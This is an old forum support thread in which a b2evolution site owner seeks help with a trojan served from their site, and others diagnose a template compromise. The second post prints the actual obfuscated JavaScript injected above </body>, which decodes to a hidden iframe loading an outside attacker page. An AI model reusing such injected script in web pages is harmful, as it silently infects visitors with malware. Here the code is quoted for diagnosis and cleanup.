Recent Topics

1 Jun 26, 2005 01:40    

Howdy. It looks like somehow my b2evo site has picked up a nasty visitor.

I've been told by some using IE that their antivirus software freaks out when they visit my site - now, today, for the first time, when I visit the front page with mozilla, I get an alert asking if I want to download "newexpl.php."

A google search seems to show this as being a trojan, but I have no idea how it got loaded on my host's server, and no idea how to get rid of it.

Any ideas? I did a search here and couldn't find any other topics on this.
Thanks.

2 Jun 26, 2005 08:51

Check your template. just above </body> you have the following :-

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>
#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherugh
u@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljk
w@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1)
{h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);
</script>

From what I've read on the web, that's the line that's causing your grief.

¥

3 Jun 26, 2005 19:17

Thanks. I'll check that out.

4 Jun 27, 2005 19:27

Wow - the obfuscated part writes an IFRAME tag, which then opens a page on the hacker's server, which downloads the newexpl.php.

Inside newexpl.php is this:

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

PCFET0NUWVBF...

It looks like an email message with an attachment.

5 Jun 27, 2005 19:41

Now how did that get in there, thats my worry... a new level of spam?

6 Jun 27, 2005 20:10

From what I found in a quick google trip, the most likely candidate is that someone else in a shared hosting environment hacked their way into being able to edit your files. This has happened on WordPress and Mambo sites as well. I suspect that any CMS that uses .php templates probably could fall victim to this attack if the server is vulnerable, but that's just my theory.

7 Jun 27, 2005 20:46

Well, the other person online I saw affected was hosted by l40.net, and I am, so apparently they aren't secure.

After they have changed my IP address 2 times in the last few months, and broke the Coppermine functionality in the process, and now this, and their support is nonexistent, I think I will be finding another host.

8 Jul 21, 2005 07:21

Hi...
Well, I edited out the offending text above, and still my site seems to be infected. I have spent the last several weeks trying to find out whats going on, difficult because I've been away from home with only sporadic web access... and my webhost is no help.

This is my last plea for help, if I can't get this solved in the next couiple of days I'm just wiping my site clean and shutting down for good...

Any clues at all? Thanks.

9 Jul 21, 2005 14:15

I would change webhosts and do a clean install of b2evolution at the new host.


Form is loading...